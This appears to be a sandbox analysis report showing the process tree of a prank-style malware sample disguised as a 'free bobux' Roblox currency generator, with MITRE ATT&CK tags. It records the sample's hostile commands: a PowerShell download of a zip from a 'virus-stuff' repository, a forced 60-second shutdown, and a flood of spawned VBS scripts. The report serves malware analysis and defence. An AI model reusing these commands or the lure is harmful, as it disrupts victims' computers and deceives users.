  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,13061490950425743179,3167092752443844155,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:1
  2⤵
  PID:5952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2000,13061490950425743179,3167092752443844155,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2104 /prefetch:8
  2⤵
  PID:4600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,13061490950425743179,3167092752443844155,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1
  2⤵
  PID:2360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2000,13061490950425743179,3167092752443844155,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6260 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\free bobux.bat" "
  2⤵
  PID:5520
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5604
- - C:\Windows\system32\timeout.exe
    timeout /t 10 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:1496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,13061490950425743179,3167092752443844155,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6520 /prefetch:1
  2⤵
  PID:2440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2000,13061490950425743179,3167092752443844155,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6580 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,13061490950425743179,3167092752443844155,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6508 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4532

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4668

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1800

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5124

C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe
"C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:5784
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\94E3.tmp\94E4.tmp\94E5.bat C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"
  2⤵
  PID:5356
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5404
- - C:\Windows\system32\timeout.exe
    timeout /t 10 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:5648

C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe
"C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:4216
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\222F.tmp\2230.tmp\2231.bat C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"
  2⤵
  - Checks computer location settings
  - Modifies registry class
  PID:4584
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5984
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\rickroll.vbs"
    3⤵
    - Checks computer location settings
    PID:5128
  - - C:\Windows\System32\SndVol.exe
      "C:\Windows\System32\SndVol.exe"
      4⤵
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:184
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/watch?v=dQw4w9WgXcQ
      4⤵
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:2940
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd8,0x104,0x7ffba782cc40,0x7ffba782cc4c,0x7ffba782cc58
        5⤵
        
        PID:1788
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2396,i,5540066060819216490,14856101668371498010,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2364 /prefetch:2
        5⤵
        
        PID:2156
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1728,i,5540066060819216490,14856101668371498010,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2500 /prefetch:3
        5⤵
        
        PID:4836
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1964,i,5540066060819216490,14856101668371498010,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2620 /prefetch:8
        5⤵
        
        PID:3644
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,5540066060819216490,14856101668371498010,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3144 /prefetch:1
        5⤵
        
        PID:5956
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3156,i,5540066060819216490,14856101668371498010,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3208 /prefetch:1
        5⤵
        
        PID:4556
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4528,i,5540066060819216490,14856101668371498010,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4532 /prefetch:8
        5⤵
        
        PID:5368
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4748,i,5540066060819216490,14856101668371498010,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4720 /prefetch:1
        5⤵
        
        PID:1736
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4928,i,5540066060819216490,14856101668371498010,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4376 /prefetch:8
        5⤵
        
        PID:3460
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5112,i,5540066060819216490,14856101668371498010,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5180 /prefetch:8
        5⤵
        Modifies registry class
        
        PID:5536
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5356,i,5540066060819216490,14856101668371498010,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5352 /prefetch:8
        5⤵
        
        PID:7204
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5332,i,5540066060819216490,14856101668371498010,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4388 /prefetch:8
        5⤵
        
        PID:7412
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5328,i,5540066060819216490,14856101668371498010,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4672 /prefetch:8
        5⤵
        
        PID:7496
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4624,i,5540066060819216490,14856101668371498010,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4408 /prefetch:8
        5⤵
        
        PID:7544
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4452,i,5540066060819216490,14856101668371498010,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5304 /prefetch:8
        5⤵
        
        PID:7916
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4552,i,5540066060819216490,14856101668371498010,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3688 /prefetch:2
        5⤵
        
        PID:7788
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=4388,i,5540066060819216490,14856101668371498010,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4340 /prefetch:1
        5⤵
        
        PID:7956
- - C:\Windows\system32\timeout.exe
    timeout /t 10 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:5132
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\shutdown.vbs"
    3⤵
    - Checks computer location settings
    PID:4564
  - - C:\Windows\System32\shutdown.exe
      "C:\Windows\System32\shutdown.exe" -s -t 60
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K start.cmd
    3⤵
    - Checks computer location settings
    - Modifies registry class
    - Suspicious behavior: GetForegroundWindowSpam
    PID:2172
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:740
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:184
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:4544
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:4976
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6100
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:4524
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:1336
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:1264
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:4232
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:5532
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:5900
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:3404
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:5724
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:5716
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:4880
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:820
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:5592
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:4304
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:3708
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:3956
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:3380
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:3576
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:3808
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:5920
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:372
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:2960
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:4964
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:3664
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:1472
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:1552
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6160
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6168
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6200
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6220
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6252
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6284
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6308
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6332
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6372
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6392
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6432
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6468
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6488
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6516
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6528
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6544
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6584
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6640
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6660
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6684
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6716
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6740
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6760
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6788
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6820
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6852
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6884
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6912
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6960
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6980
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:7008
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:7048
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:7064
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:7088
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:7124
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:7148
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6924
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:3052
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:3848
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
      4⤵
      PID:6976
- - C:\Windows\system32\timeout.exe
    timeout /t 20 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:4244
- - C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\melter.exe
    melter.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7532

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:7340

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

